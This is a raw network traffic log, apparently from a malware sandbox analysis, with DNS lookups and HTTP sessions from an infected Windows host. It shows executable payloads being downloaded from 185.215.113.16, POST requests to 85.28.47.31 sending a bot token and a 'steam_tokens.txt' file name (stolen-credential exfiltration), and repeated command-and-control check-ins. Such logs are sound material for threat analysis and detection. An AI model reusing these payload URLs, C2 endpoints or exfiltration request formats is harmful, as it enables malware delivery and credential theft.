Jul 26, 2024 10:39:17.131506920 CEST	192.168.2.6	1.1.1.1	0x895b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:39:21.766870975 CEST	192.168.2.6	1.1.1.1	0x1d16	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:38.416644096 CEST	192.168.2.6	1.1.1.1	0xab87	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:38.454133034 CEST	192.168.2.6	1.1.1.1	0xab87	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:38.591576099 CEST	192.168.2.6	1.1.1.1	0x1	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:24.245997906 CEST	192.168.2.6	1.1.1.1	0x7b93	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:40:24.734519958 CEST	192.168.2.6	1.1.1.1	0x9169	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:44.984688044 CEST	192.168.2.6	1.1.1.1	0xc096	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:44.995868921 CEST	192.168.2.6	1.1.1.1	0x4aaf	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:53.041379929 CEST	192.168.2.6	1.1.1.1	0x1a02	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:53.041518927 CEST	192.168.2.6	1.1.1.1	0xbd41	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:40:56.555810928 CEST	192.168.2.6	1.1.1.1	0x22fd	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:40:56.555980921 CEST	192.168.2.6	1.1.1.1	0xd5b	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 26, 2024 10:42:32.963402033 CEST	192.168.2.6	1.1.1.1	0x2c6a	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:42:32.963402987 CEST	192.168.2.6	1.1.1.1	0x4b99	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:42:32.963907003 CEST	192.168.2.6	1.1.1.1	0x4e40	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:42:32.978669882 CEST	192.168.2.6	1.1.1.1	0x83ef	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:42:32.980709076 CEST	192.168.2.6	1.1.1.1	0x8652	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:42:33.464534998 CEST	192.168.2.6	1.1.1.1	0xf98a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:43:16.369249105 CEST	192.168.2.6	1.1.1.1	0x64f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:43:16.369385958 CEST	192.168.2.6	1.1.1.1	0x6d65	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:43:25.520416021 CEST	192.168.2.6	1.1.1.1	0xdc44	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:43:25.541691065 CEST	192.168.2.6	1.1.1.1	0x2b8f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:43:26.818455935 CEST	192.168.2.6	1.1.1.1	0xf979	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:44:26.005930901 CEST	192.168.2.6	1.1.1.1	0x5a2d	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:44:26.479562044 CEST	192.168.2.6	1.1.1.1	0xb8ec	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:44:26.490598917 CEST	192.168.2.6	1.1.1.1	0xa5dc	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:18.082423925 CEST	80	OUT	GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 10:36:18.866930008 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:18 GMT Content-Type: application/octet-stream Content-Length: 1921024 Last-Modified: Fri, 26 Jul 2024 07:32:05 GMT Connection: keep-alive ETag: "66a350f5-1d5000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 30 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@f0L@`L@Wk,LL @.rsrc@.idata @ 0+@legihfsp@16@iwukfltx L*@.taggant00L".@
Jul 26, 2024 10:36:18.867599010 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 10:36:18.867635965 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 10:36:18.867667913 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 10:36:18.867705107 CEST	1236	IN	Data Raw: 43 56 0f 81 29 df 54 61 46 2e f0 e2 aa 8e d0 5e 5b cd 51 ae 29 11 e4 c5 99 c8 50 46 1d 39 c0 dd a1 de 72 21 d9 2a 72 0e 2b aa 5c 5f 98 16 60 10 aa d1 e4 46 99 ee 72 a2 47 32 8f 60 a9 92 50 e1 56 04 41 82 4c 97 6f 46 09 92 73 c1 e1 fe 72 66 4f 32 Data Ascii: CV)TaF.^[Q)PF9r!r+\_`FrG2`PVALoFsrfO2O_iB7P(wM/8,A$V]D^)ah9frP;N5di:@v:^<!>tr[xR`,rz\_X ,`%=B])^\|Q!"]uQ!tsRNPS:/F@9/RNV[2\b0
Jul 26, 2024 10:36:18.867737055 CEST	1236	IN	Data Raw: 9d 50 5f 5f 79 4b d3 f2 88 30 18 aa cb 9a 96 75 a2 d1 34 7e 1d b1 05 49 48 d1 55 ce 21 4e d0 33 a5 05 2b ff 8b 13 74 e2 78 1e 3c 16 6d 65 c1 7e b4 d5 44 42 3d 74 58 5f a5 c0 19 e3 a0 28 eb aa cc 80 d1 56 8d 5b a4 37 98 50 3e a4 c2 34 38 71 3d 16 Data Ascii: P__yK0u4~IHU!N3+tx<me~DB=tX_(V[7P>48q=8/P>9xSj`JGET3P4mZrEiGH cp>JD Av&k($K@y/:Re!='<jWWms\&E/v\hWkz;gPvC{a/RE
Jul 26, 2024 10:36:18.868288994 CEST	1236	IN	Data Raw: 10 9e 08 51 01 57 2d 00 eb 63 1c 66 2c 31 08 b0 3d 20 6f f0 b7 13 ee d6 a6 bf 7f 45 66 43 f2 26 3e 50 ca 32 ff be 7e 91 2e eb d1 96 1d 2f 37 89 29 20 18 77 83 1c 8c 93 e1 02 75 84 db f6 77 cc af db 40 4a b3 06 f8 6c 1e 72 8f 1c 2e 55 80 25 2e 1b Data Ascii: QW-cf,1= oEfC&>P2~./7) wuw@Jlr.U%.lxlL j?X"1aJBR(#v[Z9;^~&Mx-Z7i2/tqH#sT[kEO8Y8%innkr/#Us%F 0SW8
Jul 26, 2024 10:36:18.868324995 CEST	1236	IN	Data Raw: b5 42 10 8e 82 4f be cf 25 71 77 ee e1 ee a2 05 d6 52 29 01 76 36 b5 be 86 81 96 84 d3 8d d1 d2 20 d5 77 18 7e 60 7e 95 8a 2c db c6 71 2f 5b d7 03 73 8d b0 4e 2b ec d9 9f 9f 51 16 a7 23 02 45 3b da ea fe 7a 7f 8a 34 8e 33 5b 62 10 b7 25 c7 30 4b Data Ascii: BO%qwR)v6 w~`~,q/[sN+Q#E;z43[b%0K$*Y&Q"QR3v%vq"h1i;{ 8]jy34J&Pt+F!g2UYU@FSk)=lr@>027>ToWbHj]rx
Jul 26, 2024 10:36:18.868352890 CEST	32	IN	Data Raw: a3 e4 b2 76 59 16 43 4e 27 12 31 1d bb c6 56 f6 d1 51 f0 4a 95 f7 cb aa 40 af 6e f4 8f 0f 42 4a Data Ascii: vYCN'1VQJ@nBJ
Jul 26, 2024 10:36:18.868392944 CEST	1236	IN	Data Raw: 5d 27 fa 10 fe 2d cc 1e f4 46 67 6b ce 5c 3d 85 db 40 30 45 54 ec a4 6b 3d 39 23 5e 52 33 2e 7f 98 cf 2f 43 1b 65 18 3c 57 b3 3d 1d 55 0d 84 e8 49 ce a1 41 9b 8f 8e cb 1d cc 78 ee 5a fd d5 eb ca 9e 04 f8 bf f8 4c 44 b1 e6 70 fa a6 8d 85 a1 6b f9 Data Ascii: ]'-Fgk\=@0ETk=9#^R3./Ce<W=UIAxZLDpk3Sh1=SxgK\[6t<uEQ#a88_$IkhQCo+"oC<=u>h1xx__ov@pUVa6Ew1S:$}B6^f\}OM:335
Jul 26, 2024 10:36:18.874511957 CEST	1236	IN	Data Raw: ec f8 7d 12 2c 9d 08 30 7f 34 b0 9d 48 a2 1f 12 8d ad b5 ac dd cf 39 1c 51 19 55 cb 89 e4 46 bb f1 1e f1 79 ba a6 80 f4 28 51 07 e0 dd a2 c7 51 44 be 24 13 af f2 5e 38 9d 5f 6d 58 44 8f 61 6f bc 4f 4a f6 9d 60 58 43 a2 15 8c 76 9d ef 29 41 61 e2 Data Ascii: },04H9QUFy(QQD$^8_mXDaoOJ`XCv)Aan!#A"VDsd{spzzs@B94KD_uje_&T%U;e8sCqEVk8fD*9.WfPNdmH!H:^yu] bD~.9{iJnI/t"]Al]il:
Jul 26, 2024 10:36:20.942543983 CEST	79	OUT	GET /mine/enter.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 10:36:21.193698883 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:21 GMT Content-Type: application/octet-stream Content-Length: 1912832 Last-Modified: Fri, 26 Jul 2024 07:31:29 GMT Connection: keep-alive ETag: "66a350d1-1d3000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 b0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELAfK@K@WkKK @.rsrc@.idata @ *@yaomedmc 1@ihlphrnjK@.taggant0K"@

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:23.065886021 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Jul 26, 2024 10:36:24.175976038 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 08:36:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 10:36:24.218595028 CEST	463	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID Host: 85.28.47.31 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"files------GIEHJDHCBAEHJJJKKFID--
Jul 26, 2024 10:36:24.408466101 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 08:36:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 10:36:24.410054922 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGIDAAFIEHIEHJKFHCAE--
Jul 26, 2024 10:36:24.985265017 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 08:36:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:28.136938095 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:28.942500114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:29.018148899 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:29.283091068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:24.711534977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:40:25.515054941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:29.450592995 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:30.229417086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:30.230401039 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:30.485805035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:30.609276056 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:31.407083035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:31.474792957 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:31.763808012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:32.084433079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:32.719341993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
